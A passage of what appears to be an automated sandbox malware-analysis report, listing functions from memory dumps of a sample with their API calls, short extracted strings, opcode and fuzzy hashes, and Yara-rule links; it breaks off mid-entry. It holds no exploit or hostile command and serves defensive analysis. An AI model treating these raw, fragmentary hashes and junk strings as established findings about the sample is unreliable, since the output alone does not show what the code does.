String ID: %Y$*s$BwO$JU$X{$vd;$_g$L
API String ID: 0-2451716437
Opcode ID: 4a4ea0c54d55a6e4213482ff0c8f5e81dfa9f52d414a3bb79e912ca65c1f0a8a
Instruction ID: 7c07ba42fbc5f063d29b70d5c26d53cf56797d91e93c5802c5e9eaa403f737aa
Opcode Fuzzy Hash: 4a4ea0c54d55a6e4213482ff0c8f5e81dfa9f52d414a3bb79e912ca65c1f0a8a
Instruction Fuzzy Hash: 4FC122724083419FC764CF65C88991BFBF1FB85798F609A1DF2E686260C3B58955CF06

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B3074, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1400COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6F1B31E6

Strings

1#QNAN, xrefs: 6F1B4418
1#INF, xrefs: 6F1B441F
1#SNAN, xrefs: 6F1B4411
1#IND, xrefs: 6F1B440A

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 510fd2ae4d4a54add20b3ec570adcb82aceadd27ab1e406491f10427d78f8a37
Instruction ID: 321d37713e9669acb66a5159c3469d7f3db245499714f570ef4bc80ec1942c12
Opcode Fuzzy Hash: 510fd2ae4d4a54add20b3ec570adcb82aceadd27ab1e406491f10427d78f8a37
Instruction Fuzzy Hash: B6C25871E08628CFDB25CE28CD417DAB7B5EB59384F1141EED41DE7240E775AAA28F40

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C5FE, Relevance: 9.1, Strings: 7, Instructions: 374COMMON

Download Yara Rule

Strings

x8H, xrefs: 00C9C825
hKp, xrefs: 00C9C82F
`3", xrefs: 00C9C732
^\], xrefs: 00C9C662
dk;, xrefs: 00C9C6EE
kA^, xrefs: 00C9CAF9
kA^, xrefs: 00C9CA71

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: ^\]$`3"$dk;$hKp$kA^$kA^$x8H
API String ID: 0-1464862232
Opcode ID: 9ffc80176f70cdd365b195d140f17cc082de6fb351632d5dcd6223a84b5c3078
Instruction ID: 7285c07aa430c306a79a26041789578effeebdc33e725fc04b41e40f32b0789b
Opcode Fuzzy Hash: 9ffc80176f70cdd365b195d140f17cc082de6fb351632d5dcd6223a84b5c3078
Instruction Fuzzy Hash: EF021271D0031DDBDF28CFA5D98AAEEBBB1FB44314F208159E51ABA260D7B40A85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F19849D, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6F1983B9,00000000,?,6F198550,00000000), ref: 6F19849F
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,6F1983B9,00000000,?,6F198550,00000000), ref: 6F1984C5
HeapAlloc.KERNEL32(00000000), ref: 6F1984CC
InitializeSListHead.KERNEL32(00000000), ref: 6F1984D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F1984EE
HeapFree.KERNEL32(00000000), ref: 6F1984F5

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 51f790046f50ebd0b20237a7e856a323deebb9e88d4804c7fd1657b2fe120e89
Instruction ID: ba3b33540154bf7aca793b1111dbd4b47b763a68f18a9973c604f51fa910d193
Opcode Fuzzy Hash: 51f790046f50ebd0b20237a7e856a323deebb9e88d4804c7fd1657b2fe120e89
Instruction Fuzzy Hash: F9F06231204A01DBEB00DF789C48B1676B8BFA67F9F00442DF985D7680EF34E4218A90

Uniqueness

Uniqueness Score: -1.00%

Function 00CAECE3, Relevance: 8.9, Strings: 7, Instructions: 195COMMON

Download Yara Rule

Strings

"il, xrefs: 00CAEEE0
30, xrefs: 00CAEF1F
WA|, xrefs: 00CAEE28
mU6, xrefs: 00CAED5D
LX, xrefs: 00CAEE81
, xrefs: 00CAEE13
oZ, xrefs: 00CAEE51

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: $"il$30$LX$WA|$mU6$oZ
API String ID: 0-1531084893
Opcode ID: 91f9c8f2284525cf01490cf23f956b086f2dc8d893345e47fbea2531c7bdbc3f
Instruction ID: 7c9b9deb4793ce8579489b263a59ca1c279339272144621eeee9cf0ed6db054d
Opcode Fuzzy Hash: 91f9c8f2284525cf01490cf23f956b086f2dc8d893345e47fbea2531c7bdbc3f
Instruction Fuzzy Hash: C79144728083419FD758CF66D58941BFBF1BBC5358F108A1DF5AAA6260D3B18A49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B5F10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6F1B622F,?,00000000), ref: 6F1B5FA9
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6F1B622F,?,00000000), ref: 6F1B5FD2
GetACP.KERNEL32(?,?,6F1B622F,?,00000000), ref: 6F1B5FE7

Strings

OCP, xrefs: 6F1B5F64
ACP, xrefs: 6F1B5F2E

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 46a08bd7cf84698e061dcd0e4da70c246fa7aef924954003964fdca4d773faf2
Instruction ID: bd8238599e7f71d50667c85bde327c582caf729e5e48f356ed38b01a9cb191b8
Opcode Fuzzy Hash: 46a08bd7cf84698e061dcd0e4da70c246fa7aef924954003964fdca4d773faf2
Instruction Fuzzy Hash: E4219222644104EBE7188F2DC904EC7F3B6AF65BE6B56856DE909DB508FF32E960C350

Uniqueness

Uniqueness Score: -1.00%

Function 00CA0ADE, Relevance: 8.1, Strings: 6, Instructions: 592COMMON

Download Yara Rule

Strings

<;, xrefs: 00CA1219
s=E, xrefs: 00CA0E55
sWP, xrefs: 00CA0F86
H, xrefs: 00CA126B
n, xrefs: 00CA1049
Nw, xrefs: 00CA1284

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: <;$Nw$s=E$sWP$H$n
API String ID: 0-3418553609
Opcode ID: 6495cbf15a02de03da131957e872e232a5a51b7da12587d2f23d233eb9291b91
Instruction ID: bc49a0df8a65c17f997b142cb1cc13202588ec87f2199b339fa9770d7719bb41
Opcode Fuzzy Hash: 6495cbf15a02de03da131957e872e232a5a51b7da12587d2f23d233eb9291b91
Instruction Fuzzy Hash: 406211725083818FD374CF25C58AB8BBBE1BBC5318F14891DE6DA9A260D7B18949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00CA90BA, Relevance: 7.9, Strings: 6, Instructions: 381COMMON

Download Yara Rule

Strings

Q( , xrefs: 00CA93B3
6m, xrefs: 00CA9264
N?3, xrefs: 00CA9570
d4#, xrefs: 00CA954A
9L3, xrefs: 00CA9461
d, xrefs: 00CA9530

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 6m$9L3$N?3$Q( $d$d4#
API String ID: 0-2083278446
Opcode ID: 1712f0eb1bba02c6c7b52acee5486f5ec347b357f5ee2dcc53a5ddea585aa221
Instruction ID: ee877da74e04be2bc958b22b53c91081c963a00c98619af9cf67aacd401f0230
Opcode Fuzzy Hash: 1712f0eb1bba02c6c7b52acee5486f5ec347b357f5ee2dcc53a5ddea585aa221
Instruction Fuzzy Hash: C41241729083819FD368CF65C48AA4BBBE2FBC5758F108A1DF5D986260D7B58909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00C99384, Relevance: 7.8, Strings: 6, Instructions: 332COMMON

Download Yara Rule

Strings

?{, xrefs: 00C9955E
9E3, xrefs: 00C99566
G=, xrefs: 00C9986E
qo9, xrefs: 00C9957E
]C, xrefs: 00C995BA
\K:, xrefs: 00C9946D

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 9E3$?{$G=$\K:$]C$qo9
API String ID: 0-233201734
Opcode ID: e1ae4cfa6f6560b963041b4df9325a36dc70eec1db9f2accc14bed5ce0d5115a
Instruction ID: 0733ffefa88e3b440c1557558d0fddbba27c93677cbf9afb56db45268477c805
Opcode Fuzzy Hash: e1ae4cfa6f6560b963041b4df9325a36dc70eec1db9f2accc14bed5ce0d5115a
Instruction Fuzzy Hash: FD0210715083409FD368CF25D58AA0BFBF2FBC4758F108A1DF19A86260D7B59A49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00C9E21C, Relevance: 7.8, Strings: 6, Instructions: 316COMMON

Download Yara Rule

Strings

GD, xrefs: 00C9E311
?Hn, xrefs: 00C9E41A
vi, xrefs: 00C9E342
|t|o, xrefs: 00C9E36A
QY, xrefs: 00C9E551
}q, xrefs: 00C9E5B0

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: ?Hn$GD$QY$vi$|t|o$}q
API String ID: 0-2058854943
Opcode ID: aef1da1f1404a14c1acda291ab4a5e3bf06c010456cf2717aa7eb154b418f0a5
Instruction ID: 93c929e1d96244c10873c288ff08c60f76aa24940f063cb1183672894195847f
Opcode Fuzzy Hash: aef1da1f1404a14c1acda291ab4a5e3bf06c010456cf2717aa7eb154b418f0a5
Instruction Fuzzy Hash: 23E132B29083419FC768CF25C88994BBBF1BBD4718F10891DF5A996260E7B5D918CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00C9DAAE, Relevance: 7.8, Strings: 6, Instructions: 255COMMON

Download Yara Rule

Strings

Z~, xrefs: 00C9DCB3
i;^, xrefs: 00C9DB68
4,uE, xrefs: 00C9DD99
H9, xrefs: 00C9DD18
Cf, xrefs: 00C9DE49
D, xrefs: 00C9DF1F

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 4,uE$Cf$D$H9$i;^$Z~
API String ID: 0-3499028901
Opcode ID: 540f87cd68b8bbf5a319d6da4993999bf96e2d0c062ee22bdac6150820c65015
Instruction ID: 4bccc5ce4c0aa457066b54570ec262726c0d1aee9b9ff77e765e3460fe660967
Opcode Fuzzy Hash: 540f87cd68b8bbf5a319d6da4993999bf96e2d0c062ee22bdac6150820c65015
Instruction Fuzzy Hash: 3CD110715083809FC765CF62C98AA5FFBE1BBC4758F10891DF2A686260D3B58909DF42

Uniqueness

Uniqueness Score: -1.00%

Function 00CADEF4, Relevance: 7.7, Strings: 6, Instructions: 247COMMON

Download Yara Rule

Strings

t\E, xrefs: 00CAE306
ep#, xrefs: 00CAE001
t\E, xrefs: 00CAE20F
,jF, xrefs: 00CAE0DA
fR, xrefs: 00CAE177
K,, xrefs: 00CAE1D8

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: ,jF$K,$ep#$t\E$t\E$fR
API String ID: 0-1899525808
Opcode ID: 3f8a40610aa62a7f688cf5a4fd1430470bcc2fcb608a7e6a1d3b12097541abb6
Instruction ID: ca71d8c9265f138b3b14975d15f74d8f6c5c8ce7bdf4497e2df50319cf1bdce7
Opcode Fuzzy Hash: 3f8a40610aa62a7f688cf5a4fd1430470bcc2fcb608a7e6a1d3b12097541abb6
Instruction Fuzzy Hash: 23B132711083819FC358CF66D48991FBBE1FBC9758F508A2DF1A696260D3B5CA0ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 00C99E22, Relevance: 7.6, Strings: 6, Instructions: 114COMMON

Download Yara Rule

Strings

Fhe , xrefs: 00C99F02
$q0M, xrefs: 00C99EE5
~6, xrefs: 00C99ECD
e_, xrefs: 00C99F12
(, xrefs: 00C99F2E
9, xrefs: 00C99F4E

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: $q0M$Fhe $~6$($9$e_
API String ID: 0-442829948
Opcode ID: eaf3386c00a9a6021928f0bf2955762a7e36dae28556ba47afaff3932aa7e9f2
Instruction ID: 2430a74788ae2f096ab5e7e44603fe97d4d19cdd336e37c6c581a1358113c495
Opcode Fuzzy Hash: eaf3386c00a9a6021928f0bf2955762a7e36dae28556ba47afaff3932aa7e9f2
Instruction Fuzzy Hash: 725153724083418BCB58CF15D48A41BFBE4FBD4368F504A1DF5AAA6260D3B58B49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A3DF, Relevance: 6.6, Strings: 5, Instructions: 350COMMON

Download Yara Rule

Strings

:b-, xrefs: 00C9A6CA
,,d, xrefs: 00C9A6AD
%VwK, xrefs: 00C9A9C2
aj`, xrefs: 00C9AAD1
aj`, xrefs: 00C9A961

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: %VwK$,,d$:b-$aj`$aj`
API String ID: 0-266388962
Opcode ID: 6eb674399ee2e100479e53decf0074e52b29d170df9a878514d67e42498af44f
Instruction ID: aa1a0317678325c9a9911fe3f076ea9731250ce7a786ce03a005f2d353ff66a5
Opcode Fuzzy Hash: 6eb674399ee2e100479e53decf0074e52b29d170df9a878514d67e42498af44f
Instruction Fuzzy Hash: C60220715083819FD7A8DF25C58AA9BBBF1FBC5758F10891CF29A86260C7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1343, Relevance: 6.5, Strings: 5, Instructions: 276COMMON

Download Yara Rule

Strings

$F, xrefs: 00CB16C1
0{, xrefs: 00CB16A7
Wv, xrefs: 00CB1865
$, xrefs: 00CB13D6
$8 i, xrefs: 00CB15BA

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: $$$8 i$$F$Wv$0{
API String ID: 0-2166306512
Opcode ID: d542674c228bb78e1262d4037e8a54a6ba20e31baa530d884595c17555d6a2f9
Instruction ID: 416316130256eded6a7a6f6510428f7e8e552461604f70bf13d7a2fc42331be8
Opcode Fuzzy Hash: d542674c228bb78e1262d4037e8a54a6ba20e31baa530d884595c17555d6a2f9
Instruction Fuzzy Hash: DFD101714087809FD768CF65C589A5BFBF1FB84758F508A1CF6AA86260D7B68909CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF14D, Relevance: 6.5, Strings: 5, Instructions: 248COMMON

Download Yara Rule

Strings

sc, xrefs: 00CAF2AF
@L, xrefs: 00CAF2CC
eI, xrefs: 00CAF3C1
J`m, xrefs: 00CAF21C
4z], xrefs: 00CAF34F

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 4z]$J`m$eI$sc$@L
API String ID: 0-10485883
Opcode ID: 0457aa79bb323d492b394442f157d708262dededcb48f5498133e989c8df9230
Instruction ID: 6222665c93dc0cd7dfc4af717bdc620c0b5994fa2b22e7e030189b4ba27ac36f
Opcode Fuzzy Hash: 0457aa79bb323d492b394442f157d708262dededcb48f5498133e989c8df9230
Instruction Fuzzy Hash: 9EC13F710083819FC368DF65C58941BBBF1FB8A348F508A1EF2A686260C3B5DA49DF47

Uniqueness

Uniqueness Score: -1.00%

Function 00C94F8E, Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

=od, xrefs: 00C9514C
T@, xrefs: 00C950DD
F], xrefs: 00C95116
7], xrefs: 00C9519D
p9<, xrefs: 00C95017

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 7]$=od$F]$T@$p9<
API String ID: 0-1412243312
Opcode ID: 9e84b59e97b22c23d1388629b7ab008b42a908bec2924825724ae495d97d93b2
Instruction ID: 452c9ffa6664474122b2fd9669b1458fa975f4d3d9d9dc3568323f4fafa72fc0
Opcode Fuzzy Hash: 9e84b59e97b22c23d1388629b7ab008b42a908bec2924825724ae495d97d93b2
Instruction Fuzzy Hash: 59B14072508741AFC768CF25D98A90FBBF1BBC5788F50891DF1A986260D3B58949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00C9CC8D, Relevance: 6.5, Strings: 5, Instructions: 208COMMON

Download Yara Rule

Strings

<yG0, xrefs: 00C9CD59
V), xrefs: 00C9CDA4
LZ\9, xrefs: 00C9CED0
oQAa, xrefs: 00C9CE6B
*, xrefs: 00C9CE1B

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: *$<yG0$LZ\9$V)$oQAa
API String ID: 0-2624737150
Opcode ID: 8dec90755a9410a4b09f17b9831070af93044a3984fdd92c579cf4649da2be5c
Instruction ID: c11b574ffa41f3dab5283fe6c578386f3650656b41cf06e9fa275b15515f7c28
Opcode Fuzzy Hash: 8dec90755a9410a4b09f17b9831070af93044a3984fdd92c579cf4649da2be5c
Instruction Fuzzy Hash: 5EA121711083829FCB68CE65D98991BBBF1FBD5748F004A0CF69692260D7B1CA59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1C10, Relevance: 6.4, Strings: 5, Instructions: 173COMMON

Download Yara Rule

Strings

i"y, xrefs: 00CA1D8C
u}s, xrefs: 00CA1D74
V;, xrefs: 00CA1DFB
En, xrefs: 00CA1DE0
q"}, xrefs: 00CA1E42

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: En$i"y$q"}$u}s$V;
API String ID: 0-780694712
Opcode ID: 32bcd753cb7c93049c266a82c00551f3bf1493a8297d34bf33fa128d5f31bf0a
Instruction ID: 87f149d05eeccf2dd40fa59c03593b681d4695d09f16a9e22f3b36414d57a05b
Opcode Fuzzy Hash: 32bcd753cb7c93049c266a82c00551f3bf1493a8297d34bf33fa128d5f31bf0a
Instruction Fuzzy Hash: 2B8131714093429FC358DF61D58A40BFBF1BBC9748F505A2DF9A6A6220C3B5CA59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00C955E8, Relevance: 6.4, Strings: 5, Instructions: 168COMMON

Download Yara Rule

Strings

ng, xrefs: 00C95724
,a, xrefs: 00C95771
\RN, xrefs: 00C957AE
}, xrefs: 00C95605
6", xrefs: 00C955EE

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: ,a$6"$\RN$ng$}
API String ID: 0-2188652094
Opcode ID: 0778045cb0870823e0eb7b830a6c3733cfe52662c167badeda3e83c9c58b4696
Instruction ID: 7df2aa067f123ca255f06866dfb199719f55c34d52684fed876cf0918ce4cbd2
Opcode Fuzzy Hash: 0778045cb0870823e0eb7b830a6c3733cfe52662c167badeda3e83c9c58b4696
Instruction Fuzzy Hash: 75815E710083418FC788DF65C98A81BFBE1FBC4758F50891DF29696260D3B6CA4ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B57AC, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6F1AB726,?,?,?,?,6F1AB318,?,00000004), ref: 6F1B588E
_wcschr.LIBVCRUNTIME ref: 6F1B591E
_wcschr.LIBVCRUNTIME ref: 6F1B592C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6F1AB726,00000000,6F1AB846), ref: 6F1B59CF

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: f717f3a2d246ff143233e3dfc30da81fef4e4353d2a87a431eedea5b8ecafb17
Instruction ID: 75195f66af65e3598008b58a0efc36e19ed410d271021469bece6d48cd2d9564
Opcode Fuzzy Hash: f717f3a2d246ff143233e3dfc30da81fef4e4353d2a87a431eedea5b8ecafb17
Instruction Fuzzy Hash: 78610771600706EBEB149B3ACC81AAA77A8EF097D4F14052EE915DB1C4EB70F960C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F195239, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6F195358,6F1BB3CC,00000017), ref: 6F19523E
UnhandledExceptionFilter.KERNEL32(6F1BB3CC,?,6F195358,6F1BB3CC,00000017), ref: 6F195247
GetCurrentProcess.KERNEL32(C0000409,?,6F195358,6F1BB3CC,00000017), ref: 6F195252
TerminateProcess.KERNEL32(00000000,?,6F195358,6F1BB3CC,00000017), ref: 6F195259

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: f8d5530801d5c55b57fd19c1a79067a2b131d132db9264088de7a087ad964439
Instruction ID: b005efa6ec45e4e49b06e1aa789869c76a7e9dfeb93311700fd4c9af98cedb7c
Opcode Fuzzy Hash: f8d5530801d5c55b57fd19c1a79067a2b131d132db9264088de7a087ad964439
Instruction Fuzzy Hash: 49D00272044A08EBDE50ABE5E98DA9D3F28EB0A7AAF004410FB0AD6851DB7254618B65

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1A3C, Relevance: 5.5, Strings: 4, Instructions: 504COMMON

Download Yara Rule

Strings

K_<, xrefs: 00CB20DA
78, xrefs: 00CB21C8
q^>, xrefs: 00CB1AD0
'>, xrefs: 00CB1B3C

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: '>$78$K_<$q^>
API String ID: 0-578490123
Opcode ID: 1cfe66042626ff0af0d97e4f76a6c4a635784ab3749e960c41528fd413bdc6a1
Instruction ID: d620c57ac6babcadfd3fbaf7e1957675e48d74292251395e4bf3d0027350abae
Opcode Fuzzy Hash: 1cfe66042626ff0af0d97e4f76a6c4a635784ab3749e960c41528fd413bdc6a1
Instruction Fuzzy Hash: 7E42F1725083819FD378CF25C98AA8BBBE2BBC5744F10891DE5D996260DBB18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6F18BC70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,B5D78B91,00000000,?), ref: 6F18BCDE

Strings

\PerfmonBar\config.xml, xrefs: 6F18BD92

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: 5e13d745d50260cea41bf330b3d80d451177f2dd13bc90483bdaa19a6570d598
Instruction ID: 2fc2ef4bfb770a3a189d17ec1ae1a2f92b12d74e2abda0ba6ca05e8a94fa19a5
Opcode Fuzzy Hash: 5e13d745d50260cea41bf330b3d80d451177f2dd13bc90483bdaa19a6570d598
Instruction Fuzzy Hash: 0871A571D10658EFDB20CF64CD84B9EB7B4FB08754F104299E929A7280EB74BA54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2FA2, Relevance: 5.4, Strings: 4, Instructions: 377COMMON

Download Yara Rule

Strings

M/, xrefs: 00CA3376
iz, xrefs: 00CA326B
X', xrefs: 00CA312F
:]@^, xrefs: 00CA34D8

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: X'$:]@^$M/$iz
API String ID: 0-798460462
Opcode ID: 4435e6e6087f681de1aef124c06b05a296b86bba67768350beb1d18fabfaabc2
Instruction ID: c523df5177dbb9451e46753195559bcb553755106a77e63b98a09ae011c08f8c
Opcode Fuzzy Hash: 4435e6e6087f681de1aef124c06b05a296b86bba67768350beb1d18fabfaabc2
Instruction Fuzzy Hash: 0D0242B15093819FD768CF21D689A5BBBF1FBC5708F10891DF69A86260D7B48A09CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00CA056A, Relevance: 5.3, Strings: 4, Instructions: 267COMMON

Download Yara Rule

Strings

H9I9, xrefs: 00CA0816
o%, xrefs: 00CA06CA
gE", xrefs: 00CA06F4
h.X, xrefs: 00CA0660

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: H9I9$gE"$h.X$o%
API String ID: 0-2007577475
Opcode ID: 91f012ca8a89af4fc3d3d26b6fd38001a2c028fb83a896bf8f6b016c778f2968
Instruction ID: 469773c00ae907957c67eb5402c8ced17157ffee49f78df5278e31da7ba8f70a
Opcode Fuzzy Hash: 91f012ca8a89af4fc3d3d26b6fd38001a2c028fb83a896bf8f6b016c778f2968
Instruction Fuzzy Hash: 11D12F715083808FD368CF65C58A65FFBF1BB85758F208A1DF2A686260D3B58949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF83F, Relevance: 5.2, Strings: 4, Instructions: 240COMMON

Download Yara Rule

Strings

9a, xrefs: 00CAFA7E
e. , xrefs: 00CAFA1D
:gy, xrefs: 00CAFC54
8V, xrefs: 00CAFA4E

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 8V$9a$:gy$e.
API String ID: 0-1083161237
Opcode ID: 03cc1c01f2aa42faca73fd42d8b9637e3a4ed0e711a9f333acd8c0b2a276819f
Instruction ID: 6dddae0a241871d45a0e62a2efd2aa63d91c216fbe4ef0e830cd4021ed0abab4
Opcode Fuzzy Hash: 03cc1c01f2aa42faca73fd42d8b9637e3a4ed0e711a9f333acd8c0b2a276819f
Instruction Fuzzy Hash: 60B13F715093819FC368CF66C58944BFBE1FBC8B68F508A1DF59586260C7B5DA0ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD091, Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

(, xrefs: 00CAD20A
-, xrefs: 00CAD16B
}]}, xrefs: 00CAD0CF
mZf3, xrefs: 00CAD2E9

Memory Dump Source

